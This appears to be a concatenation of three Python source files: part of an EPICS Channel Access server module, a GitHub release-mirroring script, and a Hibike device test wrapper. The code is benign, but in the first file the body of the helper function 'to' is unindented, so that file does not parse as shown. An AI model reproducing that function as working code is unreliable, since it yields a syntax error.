    """Send a CA message to a client over an established TCP connection.
    Send failures are logged (when DEBUG) and otherwise ignored."""
    from socket import error as socket_error
    try: addr = "%s:%d" % socket.getpeername()
    except socket_error: addr = "?"
    if DEBUG: debug("Send %s %s\n" % (addr,message_info(message)))
    ##socket.setblocking(0)
    try: socket.sendall(message)
    # NOTE(review): 'error' shadows the module-level error() logger here.
    except socket_error,error:
        if DEBUG: debug("Send failed %r\n" % error)
def value(data_type,data_count,payload):
    """Convert network binary data to a Python data type.
    data_type: integer data type code
    data_count: number of elements expected (clamped to the payload size)
    payload: raw bytes; any STS_/TIME_/GR_/CTRL_ header is skipped first.
    Returns a scalar for a single element, else a list."""
    if payload == None: return None
    from struct import unpack
    data_type = type_name(data_type)
    # Compute the size of the metadata header preceding the actual value.
    # The sizes and the alignment padding follow the dbr_* structures of
    # db_access.h.
    header_size = 0
    if data_type.startswith("STS_"):
        header_size = 2+2 # status,severity
        # Add alignment padding to header.
        if data_type.endswith("CHAR"): header_size += 1
        elif data_type.endswith("DOUBLE"):header_size += 4
    elif data_type.startswith("TIME_"):
        header_size = 12
        # Add alignment padding to header.
        if data_type.endswith("SHORT"): header_size += 2
        elif data_type.endswith("ENUM"): header_size += 2
        elif data_type.endswith("CHAR"): header_size += 3
        elif data_type.endswith("DOUBLE"):header_size += 4
    elif data_type.startswith("GR_"):
        header_size = 2+2 # status,severity
        if data_type.endswith("STRING"): pass
        elif data_type.endswith("SHORT"): header_size += 8+6*2 # unit,limits
        elif data_type.endswith("FLOAT"): header_size += 2+2+8+6*4 # precision,pad,unit,limits
        elif data_type.endswith("ENUM"): header_size += 2+16*26 # nstrings,strings
        elif data_type.endswith("CHAR"): header_size += 8+6*1+1 # unit,limits,pad
        elif data_type.endswith("LONG"): header_size += 8+6*4 # unit,limits
        elif data_type.endswith("DOUBLE"):header_size += 2+2+8+6*8 # precision,pad,unit,limits
        else:
            if DEBUG: debug("value: data type %r not supported\n" % data_type)
    elif data_type.startswith("CTRL_"):
        header_size = 2+2 # status,severity
        if data_type.endswith("STRING"): pass
        elif data_type.endswith("SHORT"): header_size += 8+8*2 # unit,limits
        elif data_type.endswith("FLOAT"): header_size += 2+2+8+8*4 # precision,pad,unit,limits
        elif data_type.endswith("ENUM"): header_size += 2+16*26 # nstrings,strings
        elif data_type.endswith("CHAR"): header_size += 8+8*1+1 # unit,limits,pad
        elif data_type.endswith("LONG"): header_size += 8+8*4 # unit,limits
        elif data_type.endswith("DOUBLE"):header_size += 2+2+8+8*8 # precision,pad,unit,limits
        else:
            if DEBUG: debug("value: data type %r not supported\n" % data_type)
    payload = payload[header_size:] # strip off header
    # Decode the value itself. The data_count clamping below relies on
    # Python 2 integer division ('/' yields an int); under Python 3 it
    # would produce floats — a porting hazard.
    if data_type.endswith("STRING"):
        # Null-terminated string.
        # data_count is the number of null-terminated strings (characters)
        value = payload.split("\0")[0:data_count]
        if len(value) == 1: value = value[0]
    elif data_type.endswith("SHORT"):
        if data_count > len(payload)/2: data_count = max(len(payload)/2,1)
        payload = payload.ljust(2*data_count,"\0")
        value = list(unpack(">%dh"%data_count,payload[0:2*data_count]))
        if len(value) == 1: value = value[0]
    elif data_type.endswith("FLOAT"):
        if data_count > len(payload)/4: data_count = max(len(payload)/4,1)
        payload = payload.ljust(4*data_count,"\0")
        value = list(unpack(">%df"%data_count,payload[0:4*data_count]))
        if len(value) == 1: value = value[0]
    elif data_type.endswith("ENUM"):
        if data_count > len(payload)/2: data_count = max(len(payload)/2,1)
        payload = payload.ljust(2*data_count,"\0")
        value = list(unpack(">%dh"%data_count,payload[0:2*data_count]))
        if len(value) == 1: value = value[0]
    elif data_type.endswith("CHAR"):
        if data_count > len(payload)/1: data_count = max(len(payload)/1,1)
        payload = payload.ljust(1*data_count,"\0")
        value = list(unpack("%db"%data_count,payload[0:1*data_count]))
        if len(value) == 1: value = value[0]
    elif data_type.endswith("LONG"):
        if data_count > len(payload)/4: data_count = max(len(payload)/4,1)
        payload = payload.ljust(4*data_count,"\0")
        value = list(unpack(">%di"%data_count,payload[0:4*data_count]))
        if len(value) == 1: value = value[0]
    elif data_type.endswith("DOUBLE"):
        if data_count > len(payload)/8: data_count = max(len(payload)/8,1)
        payload = payload.ljust(8*data_count,"\0")
        value = list(unpack(">%dd"%data_count,payload[0:8*data_count]))
        if len(value) == 1: value = value[0]
    else:
        if DEBUG: debug("value: unsupported data type %r\n" % data_type)
        value = payload
    return value
def header_info(data_type,payload):
    """Report additional non-payload metadata in network binary data.
    These can be status, time, graphic or control structures.
    Returns a "{...}" summary string, or "" for plain data types."""
    # Structures are defined in db_access.h.
    if payload == None: return ""
    from struct import unpack
    data_type = type_name(data_type)
    if data_type.startswith("STS_"):
        status,severity = unpack(">HH",payload[0:4])
        # Expecting status = 0 (normal), severity = 1 (success)
        return "{status:%d,severity:%d}" % (status,severity)
    elif data_type.startswith("TIME_"):
        status,severity = unpack(">HH",payload[0:4])
        # The time stamp is represented as two uint32 values. The first is the
        # number of seconds passed since 1 Jan 1990 00:00 GMT. The second is the
        # number of nanoseconds within the second.
        seconds,nanoseconds = unpack(">II",payload[4:12])
        from time import mktime,strftime,gmtime
        offset = mktime((1990,1,1,0,0,0,0,0,0))-mktime((1970,1,1,0,0,0,0,0,0))
        t = seconds+nanoseconds*1e-9 + offset
        timestamp = strftime("%Y-%m-%d %H:%M:%S GMT",gmtime(t))
        return "{status:%d,severity:%d, timestamp:%s}" % \
            (status,severity,timestamp)
    elif data_type.startswith("GR_"):
        status,severity = unpack(">HH",payload[0:4])
        info = "status:%d,severity:%d, " % (status,severity)
        # Bug fix: the integer unpack formats below lacked the ">" prefix
        # used everywhere else in this file for network (big-endian) data,
        # so limits decoded wrong on little-endian hosts.
        if data_type.endswith("STRING"): pass
        elif data_type.endswith("SHORT"):
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">6h",payload[16:16+6*2])
            info += "unit=%r,limits=%r" % (unit,limits)
        elif data_type.endswith("FLOAT"):
            precision, = unpack(">h",payload[4:6])
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">6f",payload[16:16+6*4])
            info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
        elif data_type.endswith("ENUM"):
            nstrings, = unpack(">h",payload[4:6])
            strings = payload[6:6+16*26]
            info += "nstrings=%r" % nstrings
        elif data_type.endswith("CHAR"):
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">6b",payload[16:16+6*1])
            info += "unit=%r,limits=%r" % (unit,limits)
        elif data_type.endswith("LONG"):
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">6i",payload[16:16+6*4])
            info += "unit=%r,limits=%r" % (unit,limits)
        elif data_type.endswith("DOUBLE"):
            precision, = unpack(">h",payload[4:6])
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">6d",payload[16:16+6*8])
            info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
        else: info += "?"
        # Bug fix: was 'info.restrip(", ")' — AttributeError; 'rstrip' as
        # in the CTRL_ branch below.
        info = info.rstrip(", ")
        return "{"+info+"}"
    elif data_type.startswith("CTRL_"):
        status,severity = unpack(">HH",payload[0:4])
        info = "status:%d,severity:%d, " % (status,severity)
        # Same big-endian fix as in the GR_ branch above.
        if data_type.endswith("STRING"): pass
        elif data_type.endswith("SHORT"):
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">8h",payload[16:16+8*2])
            info += "unit=%r,limits=%r" % (unit,limits)
        elif data_type.endswith("FLOAT"):
            precision, = unpack(">h",payload[4:6])
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">8f",payload[16:16+8*4])
            info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
        elif data_type.endswith("ENUM"):
            nstrings, = unpack(">h",payload[4:6])
            strings = payload[6:6+16*26]
            info += "nstrings=%r" % nstrings
        elif data_type.endswith("CHAR"):
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">8b",payload[16:16+8*1])
            info += "unit=%r,limits=%r" % (unit,limits)
        elif data_type.endswith("LONG"):
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">8i",payload[16:16+8*4])
            info += "unit=%r,limits=%r" % (unit,limits)
        elif data_type.endswith("DOUBLE"):
            precision, = unpack(">h",payload[4:6])
            unit = payload[8:16].rstrip("\0")
            limits = unpack(">8d",payload[16:16+8*8])
            info += "precision=%r,unit=%r,limits=%r" % (precision,unit,limits)
        else: info += "?"
        info = info.rstrip(", ")
        return "{"+info+"}"
    return ""
def convert(PV_name,value):
    """Convert value to the correct data type for the given process variable.
    The target type is taken from the PV's current value; scalars and
    arrays (element-wise) are handled separately. On conversion failure a
    default-constructed value of the target type is used."""
    # The value of a PV might be passed as string when the PV type is actually
    # DOUBLE.
    current_value = PV_value(PV_name)
    if current_value is None: new_value = value
    elif not isarray(current_value):
        dtype = type(current_value)
        try: new_value = dtype(value)
        except Exception,message:
            if DEBUG: debug("convert: %r from %r to %r failed: %r" %
                (PV_name,value,dtype,message))
            new_value = dtype()
    else:
        if not isarray(value): value = [value]
        # Convert each array element.
        # Element type is taken from the first current element; an empty
        # current array defaults to float.
        if len(current_value) > 0: dtype = type(current_value[0])
        else: dtype = float
        try: new_value = [dtype(x) for x in value]
        except Exception,message:
            if DEBUG: debug("convert: %r from %r to %r failed: %r" %
                (PV_name,value,dtype,message))
            new_value = [dtype()]*len(value)
    if new_value != value:
        if DEBUG: debug("converting %r from %r to %r" % (PV_name,value,new_value))
    return new_value
def CA_type(value):
    """Channel Access data type for a Python variable, as integer type code
    (an index into the module-level 'types' table).

    Strings -> STRING; numpy arrays are mapped by dtype; lists use their
    first element; empty lists default to DOUBLE; unknown types -> STRING.
    """
    if issubclass(type(value),basestring): return types["STRING"]
    if hasattr(value,"dtype"): # value is a numpy array: map dtype to CA type
        from numpy import int8,int16,int32,float32,int64,float64
        if value.dtype == int16: return types["SHORT"]
        if value.dtype == float32: return types["FLOAT"]
        if value.dtype == int8: return types["CHAR"]
        if value.dtype == int32: return types["LONG"]
        # CA has no 64-bit integer type; 64-bit ints are narrowed to LONG.
        if value.dtype == int64: return types["LONG"]
        if value.dtype == float64: return types["DOUBLE"]
        if value.dtype == bool: return types["CHAR"]
        return types["STRING"]
    # If a list is given, use the first element to determine the type.
    if isarray(value):
        if len(value)>0: value = value[0]
        else: return types["DOUBLE"]
    # Exact type checks (not isinstance): bool is handled by its own branch.
    if type(value) == int: return types["LONG"]
    if type(value) == float: return types["DOUBLE"]
    if type(value) == bool: return types["SHORT"]
    return types["STRING"]
def CA_count(value):
    """Number of Channel Access elements represented by value.

    Arrays report their length; scalars report 1.  In CA, a string counts
    as a single element, so strings also report 1.
    """
    if issubclass(type(value),basestring):
        return 1
    return len(value) if isarray(value) else 1
def network_data(value,data_type):
    """Convert a Python data type to binary data for network transmission.

    value: scalar or array to encode
    data_type: integer number for CA payload data type (0 = STRING, 1 = SHORT)
    Returns the big-endian CA payload as a byte string: an optional
    STS_/TIME_/GR_/CTRL_ metadata header (status/severity, optional
    timestamp, precision/unit/limits placeholders), followed by the value(s).
    NOTE(review): the metadata fields (unit, limits, enum strings) are
    emitted as zero padding only — this server does not fill them in.
    """
    from struct import pack
    data_type = type_name(data_type)
    payload = ""
    precision = 8 # Number of digits displayed in MEDM screen
    if data_type.startswith("STS_"):
        # Status header: status + severity, 16-bit each.
        status = 0 # 0 = normal
        severity = 1 # 1 = success
        payload += pack(">HH",status,severity)
        # Add alignment padding to the header.
        if data_type.endswith("CHAR"): payload += '\0'
        elif data_type.endswith("DOUBLE"): payload += '\0'*4
    elif data_type.startswith("TIME_"):
        # Add time header
        from time import mktime,time
        status = 0 # 0 = normal
        severity = 1 # 1 = success
        # The time stamp is represented as two uint32 values. The first is the
        # number of seconds passed since 1 Jan 1990 00:00 GMT. The second is the
        # number of nanoseconds within the second.
        offset = mktime((1990,1,1,0,0,0,0,0,0))-mktime((1970,1,1,0,0,0,0,0,0))
        timestamp = time()-offset
        seconds = int(timestamp)
        nanoseconds = int((timestamp%1)*1e9)
        payload += pack(">HHII",status,severity,seconds,nanoseconds)
        # Add alignment padding to the header.
        if data_type.endswith("SHORT"): payload += '\0'*2
        elif data_type.endswith("ENUM"): payload += '\0'*2
        elif data_type.endswith("CHAR"): payload += '\0'*3
        elif data_type.endswith("DOUBLE"): payload += '\0'*4
    elif data_type.startswith("GR_"):
        # Graphics header: status/severity plus zeroed unit/limit fields.
        status = 0 # 0 = normal
        severity = 1 # 1 = success
        payload += pack(">HH",status,severity)
        if data_type.endswith("STRING"): pass
        elif data_type.endswith("SHORT"):
            payload += '\0'*(8+6*2) # unit,limits
        elif data_type.endswith("FLOAT"):
            payload += pack(">h",precision)
            payload += '\0'*(2+8+6*4) # pad,unit,limits
        elif data_type.endswith("ENUM"):
            payload += '\0'*(2+16*26) # number of strings,strings
        elif data_type.endswith("CHAR"):
            payload += '\0'*(8+6*1+1) # unit,limits,pad
        elif data_type.endswith("LONG"):
            payload += '\0'*(8+6*4) # unit,limits
        elif data_type.endswith("DOUBLE"):
            payload += pack(">h",precision)
            payload += '\0'*(2+8+6*8) # pad,unit,limits
        else:
            if DEBUG: debug("network_data: data type %r not supported\n" % data_type)
    elif data_type.startswith("CTRL_"):
        # Control header: like GR_ but with 8 limit fields instead of 6.
        status = 0 # 0 = normal
        severity = 1 # 1 = success
        payload += pack(">HH",status,severity)
        if data_type.endswith("STRING"): pass
        elif data_type.endswith("SHORT"):
            payload += '\0'*(8+8*2) # unit,limits
        elif data_type.endswith("FLOAT"):
            payload += pack(">h",precision)
            payload += '\0'*(2+8+8*4) # pad,unit,limits
        elif data_type.endswith("ENUM"):
            payload += '\0'*(2+16*26) # number of strings,strings
        elif data_type.endswith("CHAR"):
            payload += '\0'*(8+8*1+1) # unit,limits,pad
        elif data_type.endswith("LONG"):
            payload += '\0'*(8+8*4) # unit,limits
        elif data_type.endswith("DOUBLE"):
            payload += pack(">h",precision)
            payload += '\0'*(2+8+8*8) # pad,unit,limits
        else:
            if DEBUG: debug("network_data: data type %r not supported\n" % data_type)
    # Append the value(s) themselves, big-endian, element by element.
    from numpy import int8,int16,int32,float32,float64
    if data_type.endswith("STRING"):
        if isarray(value):
            # Null-terminated strings.
            payload += "\0".join([str(v) for v in value])
        else: payload += str(value)
    elif data_type.endswith("SHORT"):
        if isarray(value):
            for v in value: payload += pack(">h",to(v,int16))
        else: payload += pack(">h",to(value,int16))
    elif data_type.endswith("FLOAT"):
        if isarray(value):
            for v in value: payload += pack(">f",to(v,float32))
        else: payload += pack(">f",to(value,float32))
    elif data_type.endswith("ENUM"):
        if isarray(value):
            for v in value: payload += pack(">h",to(v,int16))
        else: payload += pack(">h",to(value,int16))
    elif data_type.endswith("CHAR"):
        if isarray(value):
            for v in value: payload += pack("b",to(v,int8))
        else: payload += pack("b",to(value,int8))
    elif data_type.endswith("LONG"):
        if isarray(value):
            for v in value: payload += pack(">i",to(v,int32))
        else: payload += pack(">i",to(value,int32))
    elif data_type.endswith("DOUBLE"):
        if isarray(value):
            for v in value: payload += pack(">d",to(v,float64))
        else: payload += pack(">d",to(value,float64))
    else:
        if DEBUG: debug("network_data: unsupported data type %r\n" % data_type)
        payload += str(value)
    return payload
def to(value,dtype):
"""Force conversion to int data type. If failed return 0:
dtype: int8, int32, int64"""
isfloat = "float" in str(dtype)
try: return dtype(value)
except: return 0 if not isfloat else 0.0
def isarray(value):
    "Is the value a container, like tuple, list or numpy array?"
    # Strings also have __len__, but this module treats them as scalars,
    # so they are excluded explicitly before the length check.
    if issubclass(type(value),basestring):
        return False
    return hasattr(value,"__len__")
def date_string(seconds=None):
    """Date and time as formatted ASCII text, precise to 1 ms.

    seconds: POSIX timestamp; defaults to the current time.
    NOTE(review): when the microseconds happen to be exactly zero,
    datetime's string form omits the fractional part and the trailing
    slice removes the last 3 characters of the seconds field instead.
    """
    from time import time
    from datetime import datetime
    if seconds is None:
        seconds = time()
    # Chop the last 3 digits of the microseconds -> millisecond precision.
    return str(datetime.fromtimestamp(seconds))[:-3]
def modulename():
    """Name of this Python module, without directory and extension,
    as used for 'import'"""
    from inspect import getmodulename,getfile
    # getfile(modulename) deliberately passes this function object itself:
    # inspect resolves it to the source file the function was defined in.
    return getmodulename(getfile(modulename))
def nan_equal(a,b):
    """Do a and b have the same value, treating nan as equal to nan?
    Operates on the PV_data() of each argument and recurses element-wise
    into equal-length containers.
    Return value: True or False"""
    ##if DEBUG: debug("nan_equal(%r,%r)?" % (a,b))
    a,b = PV_data(a),PV_data(b)
    from numpy import isnan
    # isnan raises TypeError on non-numeric input; in that case fall
    # through to the ordinary comparison below.
    try:
        if isnan(a) and isnan(b): return True
    except: pass
    # Work-around for the following problem:
    # if a == b: ...
    # ValueError: The truth value of an array with more than one element is
    # ambiguous. Use a.any() or a.all()
    # Equal-length non-string containers are compared element by element.
    if not isinstance(a,basestring) and not isinstance(b,basestring) and \
        hasattr(a,"__len__") and hasattr(b,"__len__") and len(a) == len(b):
        return all([nan_equal(x,y) for (x,y) in zip(a,b)])
    return bool(a == b)
def nan_equal_2(a,b):
    """Are two arrays containing nan identical, assuming nan == nan?
    Returns True or False."""
    from numpy import asarray
    from numpy.testing import assert_equal
    a,b = asarray(a),asarray(b)
    # assert_equal treats nan as equal to nan and raises AssertionError on
    # any mismatch.  BUG FIX: the original set 'value = True' unconditionally
    # AFTER the try/except, overwriting the False from the except branch, so
    # the function always returned True.
    try:
        assert_equal(a,b)
        value = True
    except AssertionError:
        value = False
    if DEBUG: debug("nan_equal(%r,%r): %r" % (a,b,value))
    return value
def logfile():
    """Path of the log file; always empty (kept for backward compatibility)."""
    return ""
if __name__ == "__main__": # for testing
    from pdb import pm
    import logging
    from tempfile import gettempdir
    # NOTE(review): this rebinding shadows the module-level logfile()
    # function above; it is only used for the (commented-out) filename arg.
    logfile = gettempdir()+"/CAServer.log"
    logging.basicConfig(
        level=logging.DEBUG,
        format="%(asctime)s: %(levelname)s %(message)s",
        ##filename=logfile,
    )
    DEBUG = True
    # Publish a test PV, then print commands to inspect it from a client.
    PV_name = "TEST:TEST.VAL"
    casput(PV_name,"test")
    print('from epics import *; caget(%r)' % PV_name)
    print('from epics import *; camonitor(%r)' % PV_name)
|
github-release.py | #!/usr/bin/env python3
import os
import sys
import threading
import traceback
import queue
from pathlib import Path
from datetime import datetime
import requests
import yaml
BASE_URL = os.getenv("UPSTREAM_URL", "https://api.github.com/repos/")
WORKING_DIR = os.getenv("TUNASYNC_WORKING_DIR")
WORKERS = int(os.getenv("WORKERS", "8"))
FAST_SKIP = bool(os.getenv("FAST_SKIP", ""))
def get_repos():
    """Load the list of repositories to mirror.

    Reads /repos.yaml, falling back to the REPOS environment variable when
    the file is missing.  The YAML may be either a bare list or a mapping
    with a 'repos' key whose value is a list.
    Raises Exception when neither source is available or the content is not
    a list.
    """
    try:
        with open('/repos.yaml') as f:
            content = f.read()
    except FileNotFoundError:
        content = os.getenv("REPOS", None)
        if content is None:
            raise Exception("Loading /repos.yaml file and reading REPOS env both failed")
    parsed = yaml.safe_load(content)
    if isinstance(parsed, list):
        return parsed
    repos = parsed['repos']
    if not isinstance(repos, list):
        raise Exception("Can not inspect repo list from the given file/env")
    return repos
# Repo list is resolved once, at import time.
REPOS = get_repos()
# connect and read timeout value (seconds) passed to requests
TIMEOUT_OPTION = (7, 10)
# Running total of bytes expected, accumulated by download() in main().
total_size = 0
def sizeof_fmt(num, suffix='iB'):
    """Render a byte count as a human-readable string, e.g. 1536 -> '1.50KiB'.

    Scales num down by factors of 1024 until it fits the next unit prefix;
    values beyond zetta fall through to the yotta ('Y') prefix.
    """
    for prefix in ('', 'K', 'M', 'G', 'T', 'P', 'E', 'Z'):
        if abs(num) < 1024.0:
            return "%3.2f%s%s" % (num, prefix, suffix)
        num /= 1024.0
    return "%.2f%s%s" % (num, 'Y', suffix)
# wrap around requests.get to use token if available
def github_get(*args, **kwargs):
    """requests.get wrapper that attaches a GitHub token auth header.

    When GITHUB_TOKEN is present in the environment, an
    'Authorization: token <...>' header is merged into the request.
    """
    headers = kwargs.get('headers', {})
    token = os.environ.get('GITHUB_TOKEN')
    if token is not None:
        headers['Authorization'] = 'token {}'.format(token)
    kwargs['headers'] = headers
    return requests.get(*args, **kwargs)
def do_download(remote_url: str, dst_file: Path, remote_ts: float):
    """Stream remote_url into dst_file, then stamp atime/mtime with remote_ts."""
    # NOTE the stream=True parameter below: the body is fetched in chunks,
    # not loaded into memory at once.
    with github_get(remote_url, stream=True) as r:
        r.raise_for_status()
        with open(dst_file, 'wb') as f:
            for chunk in r.iter_content(chunk_size=1024**2):
                # filter out keep-alive new chunks
                if chunk:
                    f.write(chunk)
    # Mirror the remote timestamp so later syncs can skip unchanged files.
    os.utime(dst_file, (remote_ts, remote_ts))
def downloading_worker(q):
    """Consume (url, dst_file, working_dir, updated) tuples from q until a
    None sentinel arrives; download each and acknowledge with task_done()."""
    # iter(q.get, None) keeps calling q.get() until it returns the sentinel.
    for item in iter(q.get, None):
        url, dst_file, working_dir, updated = item
        print("downloading", url, "to",
              dst_file.relative_to(working_dir), flush=True)
        try:
            do_download(url, dst_file, updated)
        except Exception:
            print("Failed to download", url, flush=True)
            # Drop any partial file so the next sync retries it.
            if dst_file.is_file():
                dst_file.unlink()
        q.task_done()
def create_workers(n):
    """Spawn n downloader threads sharing one task queue; return the queue."""
    task_queue = queue.Queue()
    for _ in range(n):
        worker = threading.Thread(target=downloading_worker, args=(task_queue, ))
        worker.start()
    return task_queue
def ensure_safe_name(filename):
    """Sanitize a release/asset name for use as a single path component.

    NUL bytes become spaces, the special names '.' and '..' are padded so
    they no longer refer to directories, and both path separators ('/'
    and '\\') collapse to '_'.
    """
    cleaned = filename.replace('\0', ' ')
    if cleaned == '.':
        return ' .'
    if cleaned == '..':
        return '. .'
    # '/' -> '\\' -> '_' ; net effect: both separators become '_'.
    return cleaned.replace('/', '\\').replace('\\', '_')
def main():
    """Mirror GitHub release assets for every configured repo into
    --working-dir, then delete local files no longer present upstream."""
    import argparse
    parser = argparse.ArgumentParser()
    parser.add_argument("--base-url", default=BASE_URL)
    parser.add_argument("--working-dir", default=WORKING_DIR)
    parser.add_argument("--workers", default=WORKERS, type=int,
                        help='number of concurrent downloading jobs')
    parser.add_argument("--fast-skip", action='store_true', default=FAST_SKIP,
                        help='do not verify size and timestamp of existing files')
    args = parser.parse_args()

    if args.working_dir is None:
        raise Exception("Working Directory is None")

    working_dir = Path(args.working_dir)
    task_queue = create_workers(args.workers)
    # Every file that SHOULD exist locally; used for cleanup afterwards.
    remote_filelist = []
    cleaning = False

    def download(release, release_dir, tarball=False):
        """Queue all assets (and optionally the source tarball) of one release."""
        global total_size

        if tarball:
            url = release['tarball_url']
            updated = datetime.strptime(
                release['published_at'], '%Y-%m-%dT%H:%M:%SZ').timestamp()
            dst_file = release_dir / 'repo-snapshot.tar.gz'
            remote_filelist.append(dst_file.relative_to(working_dir))

            # Tarballs have no size/timestamp metadata to verify, so an
            # existing file is always trusted.
            if dst_file.is_file():
                print("skipping", dst_file.relative_to(working_dir), flush=True)
            else:
                dst_file.parent.mkdir(parents=True, exist_ok=True)
                task_queue.put((url, dst_file, working_dir, updated))

        for asset in release['assets']:
            url = asset['browser_download_url']
            updated = datetime.strptime(
                asset['updated_at'], '%Y-%m-%dT%H:%M:%SZ').timestamp()
            dst_file = release_dir / ensure_safe_name(asset['name'])
            remote_filelist.append(dst_file.relative_to(working_dir))
            total_size += asset['size']

            if dst_file.is_file():
                if args.fast_skip:
                    print("fast skipping", dst_file.relative_to(
                        working_dir), flush=True)
                    continue
                else:
                    stat = dst_file.stat()
                    local_filesize = stat.st_size
                    local_mtime = stat.st_mtime
                    # Skip when the local copy is newer, or matches the
                    # remote size and timestamp exactly.
                    if local_mtime > updated or \
                            asset['size'] == local_filesize and local_mtime == updated:
                        print("skipping", dst_file.relative_to(
                            working_dir), flush=True)
                        continue
            else:
                dst_file.parent.mkdir(parents=True, exist_ok=True)

            task_queue.put((url, dst_file, working_dir, updated))

    def link_latest(name, repo_dir):
        """Point the 'LatestRelease' symlink at the named release folder;
        failures are deliberately ignored (best-effort)."""
        try:
            os.unlink(repo_dir / "LatestRelease")
        except OSError:
            pass
        try:
            os.symlink(name, repo_dir / "LatestRelease")
        except OSError:
            pass

    for cfg in REPOS:
        flat = False # build a folder for each release
        versions = 1 # keep only one release
        tarball = False # do not download the tarball
        prerelease = False # filter out pre-releases
        if isinstance(cfg, str):
            repo = cfg
        else:
            repo = cfg["repo"]
            if "versions" in cfg:
                versions = cfg["versions"]
            if "flat" in cfg:
                flat = cfg["flat"]
            if "tarball" in cfg:
                tarball = cfg["tarball"]
            if "pre_release" in cfg:
                prerelease = cfg["pre_release"]
        repo_dir = working_dir / Path(repo)
        print(f"syncing {repo} to {repo_dir}")

        try:
            r = github_get(f"{args.base_url}{repo}/releases")
            r.raise_for_status()
            releases = r.json()
        except:
            # A failed fetch aborts the whole sync (break, not continue) so
            # the for/else below leaves 'cleaning' False and no local files
            # are deleted based on an incomplete remote listing.
            traceback.print_exc()
            break

        n_downloaded = 0
        for release in releases:
            if not release['draft'] and (prerelease or not release['prerelease']):
                name = ensure_safe_name(release['name'] or release['tag_name'])
                if len(name) == 0:
                    print("Error: Unnamed release")
                    continue
                download(release, (repo_dir if flat else repo_dir / name), tarball)
                if n_downloaded == 0 and not flat:
                    # create a symbolic link to the latest release folder
                    link_latest(name, repo_dir)
                n_downloaded += 1
                if versions > 0 and n_downloaded >= versions:
                    break
        if n_downloaded == 0:
            print(f"Error: No release version found for {repo}")
            continue
    else:
        # for/else: only clean up when every repo was processed without break.
        cleaning = True

    # block until all tasks are done
    task_queue.join()
    # stop workers
    for i in range(args.workers):
        task_queue.put(None)

    if cleaning:
        local_filelist = []
        for local_file in working_dir.glob('**/*'):
            if local_file.is_file():
                local_filelist.append(local_file.relative_to(working_dir))

        # Delete anything on disk that upstream no longer serves.
        for old_file in set(local_filelist) - set(remote_filelist):
            print("deleting", old_file, flush=True)
            old_file = working_dir / old_file
            old_file.unlink()

        for local_dir in working_dir.glob('*/*/*'):
            if local_dir.is_dir():
                try:
                    # remove empty dirs only
                    local_dir.rmdir()
                except:
                    pass

    print("Total size is", sizeof_fmt(total_size, suffix=""))
if __name__ == "__main__":
    main()

# vim: ts=4 sw=4 sts=4 expandtab
|
hibike_tester.py | """
Create a separate Hibike process, for testing.
"""
import threading
import time
import queue
from multiprocessing import Process, Pipe, Queue
from runtime import hibike_process
from runtime import hibike_message
class Hibike:
    """
    Interface to a separate Hibike process.

    Spawns hibike_process in a daemon subprocess, talks to it over a pipe,
    and runs a background thread that drains the process's state queue into
    self.uids (connected devices) and self.device_values_cache.
    """
    # Default subscription delay passed to devices, in milliseconds.
    DEFAULT_DELAY = 100

    def __init__(self):
        self.bad_things_queue = Queue()
        self.state_queue = Queue()
        self.pipe_to_child, self.pipe_from_child = Pipe()
        self.hibike_process = Process(target=hibike_process.hibike_process,
                                      args=(self.bad_things_queue,
                                            self.state_queue, self.pipe_from_child))
        # Daemonized so a crashed test does not leave the process behind.
        self.hibike_process.daemon = True
        self.hibike_process.start()
        self.uids = set()
        self.terminating = threading.Event()
        # NOTE(review): out_thread starts before device_values_cache is
        # assigned below; a "device_values" message arriving immediately
        # could hit an AttributeError — confirm ordering is acceptable.
        self.out_thread = threading.Thread(target=self.process_output)
        self.out_thread.start()
        self.device_values_cache = {}

    def process_output(self):
        """
        Processes the output uploaded to the state queue by the devices.

        If it's a subscription response from a device whose uid is not in
        self.uids, the uid will be added to self.uids.
        If it's a device disconnection from a device whose uid is in
        self.uids, the uid will be removed from self.uids.
        If it's a device value, cache it in the dictionary.
        """
        while not self.terminating.is_set():
            # 1-second timeout so the terminating flag is re-checked
            # periodically instead of blocking forever on an empty queue.
            try:
                command, data = self.state_queue.get(timeout=1)
            except queue.Empty:
                continue
            if command == "device_subscribed":
                uid = data[0]
                self.uids.add(uid)
            elif command == "device_disconnected":
                uid = data[0]
                self.uids.discard(uid)
            elif command == "device_values":
                for uid, params in data[0].items():
                    for key, value in params:
                        self.device_values_cache.setdefault(uid, {})[key] = value

    def get_last_cached(self, uid, param):
        """
        Get the last value of PARAM received from the device at UID.

        Precondition: a device_data with a UID, params, and values must have
        been received from the param before calling this function.
        Returns None (and prints a notice) when nothing is cached yet.
        """
        try:
            return self.device_values_cache[uid][param]
        except KeyError:
            print("Could not get parameter {} from {}".format(param, uid))
            return None

    def get_uids_and_types(self):
        """
        Returns a list of tuples of all of the uids of all devices that the
        HibikeCommunicator talks to. Tuple structure: (uid, device type name).
        """
        return [(uid, hibike_message.uid_to_device_name(uid)) for uid in self.uids]

    def enumerate(self):
        """
        Enumerate all devices.
        """
        self.pipe_to_child.send(["enumerate_all", []])

    def subscribe(self, uid, delay, params):
        """
        Subscribe to device UID, with DELAY delay, and parameters PARAMS.
        """
        self.pipe_to_child.send(["subscribe_device", [uid, delay, params]])

    def subscribe_all(self):
        """
        Subscribe to all devices with all parameters.
        """
        for uid in self.uids:
            dev_id = hibike_message.uid_to_device_id(uid)
            all_params = hibike_message.all_params_for_device_id(dev_id)
            # Only readable parameters can be subscribed to.
            readable_params = []
            for param in all_params:
                if hibike_message.readable(dev_id, param):
                    readable_params.append(param)
            self.pipe_to_child.send(["subscribe_device", [uid, self.DEFAULT_DELAY,
                                                          readable_params]])

    def write(self, uid, params_and_values):
        """
        Write PARAMS_AND_VALUES to the device at UID.
        """
        self.pipe_to_child.send(["write_params", [uid, params_and_values]])

    def read(self, uid, params):
        """
        Read PARAMS from the device at UID.
        """
        self.pipe_to_child.send(["read_params", [uid, params]])

    def disable(self):
        """
        Disable all attached devices.
        """
